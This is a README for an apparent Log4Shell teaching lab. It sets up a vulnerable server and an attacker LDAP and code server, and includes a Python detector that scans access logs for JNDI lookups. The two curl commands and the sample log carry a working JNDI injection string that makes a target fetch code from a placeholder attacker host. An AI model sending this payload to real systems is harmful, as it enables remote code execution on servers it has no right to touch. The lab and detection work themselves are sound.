This project aims to demonstrate how the Log4Shell / CVE-2021-44228 vulnerability works.
You only need to have Docker installed. Ideally you have two different virtual machines: one for the vulnerable server and one for the malicious server, which will host the malicious codebase and an LDAP server.
Optionally you can have Make and Docker Compose installed, but this is not necessary, since this repo also contains a `make.sh` that skips these requirements and runs them from within a Docker container.
If you haven't already installed Docker on a Debian VM, you can follow these steps: https://gist.github.com/mschmnet/5d8c979920801c73e148c901a5989b46
```sh
git clone git@github.com:mschmnet/Log4Shell-demo.git
cd Log4Shell-demo/vulnerable-server
../make.sh run # Or you could execute `make run` if you had Make and Docker Compose installed
```
This will start a basic LDAP server and a basic Python server to serve the malicious Java classes.
You need to provide the IP address or domain name where these servers will be reachable:
```sh
cd malicious-server
../make.sh run CODEBASE_URL=SERVER_IP_OR_DOMAIN_NAME # Optionally `make run ...` instead of `../make.sh run ...` if you had Make and Docker Compose installed
```
```sh
curl -X GET -G --data-urlencode 'foo=${jndi:ldap://IP_OR_DOMAIN_MALICIOUS_SERVER:1389/a}' http://IP_OR_DOMAIN_VULNERABLE_SERVER/some-endpoint
```
or just
```sh
curl --location --request GET 'http://IP_OR_DOMAIN_VULNERABLE_SERVER/some-endpoint?foo=%24%7Bjndi%3Aldap%3A%2F%2FIP_OR_DOMAIN_MALICIOUS_SERVER%3A1389%2Fa%7D'
```
where `%24%7Bjndi%3Aldap%3A%2F%2FIP_OR_DOMAIN_MALICIOUS_SERVER%3A1389%2Fa%7D` is just `${jndi:ldap://IP_OR_DOMAIN_MALICIOUS_SERVER:1389/a}` URL encoded.
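The request above carries the lookup string either raw or percent-encoded, so a log-side check has to URL-decode the query string before matching. The following is an added detection example, not code from the Log4Shell-demo repo; the access-log lines are constructed and reuse the placeholder hosts from this README.

```python
"""Flag HTTP access-log entries whose query parameters carry a Log4j JNDI lookup."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Log4j 2 lookup syntax is ${name:...}; the JNDI lookup is the one that makes
# CVE-2021-44228 exploitable. Match case-insensitively, after decoding.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Common-log-format request part: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log (not real traffic). Lines 1 and 3 mirror the two curl
# invocations in this README (percent-encoded and raw); line 2 is benign.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /some-endpoint?foo=%24%7Bjndi%3Aldap%3A%2F%2FIP_OR_DOMAIN_MALICIOUS_SERVER%3A1389%2Fa%7D HTTP/1.1" 200 12
10.0.0.6 - - [10/Dec/2021:12:00:02 +0000] "GET /some-endpoint?foo=bar&x=1 HTTP/1.1" 200 12
10.0.0.7 - - [10/Dec/2021:12:00:03 +0000] "GET /some-endpoint?foo=${jndi:ldap://IP_OR_DOMAIN_MALICIOUS_SERVER:1389/a} HTTP/1.1" 200 12
"""


def decoded_values(target):
    """Yield (param, value) pairs from a request target, URL-decoded.

    parse_qsl decodes one layer of percent-encoding; the extra unquote also
    normalises values that arrived encoded twice, so matching sees plain text.
    """
    query = urlsplit(target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        yield name, unquote(value)


def find_jndi_lookups(log_text):
    """Return [(client_ip, param, decoded_value)] for every parameter that
    contains a JNDI lookup string."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        client_ip = line.split(" ", 1)[0]
        for name, value in decoded_values(m.group("target")):
            if JNDI_LOOKUP.search(value):
                findings.append((client_ip, name, value))
    return findings


if __name__ == "__main__":
    for ip, param, value in find_jndi_lookups(SAMPLE_LOG):
        print(f"JNDI lookup from {ip} in parameter {param!r}: {value}")
```

Both the encoded and the raw request are reported with the same decoded value, which is what you want to pivot on when hunting across servers.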
To stop the containers:
```sh
../make.sh stop
```
To follow the container logs:
```sh
../make.sh logs
```
Slides: https://raw.githubusercontent.com/mschmnet/Log4Shell-demo/main/pdf/slides.pdf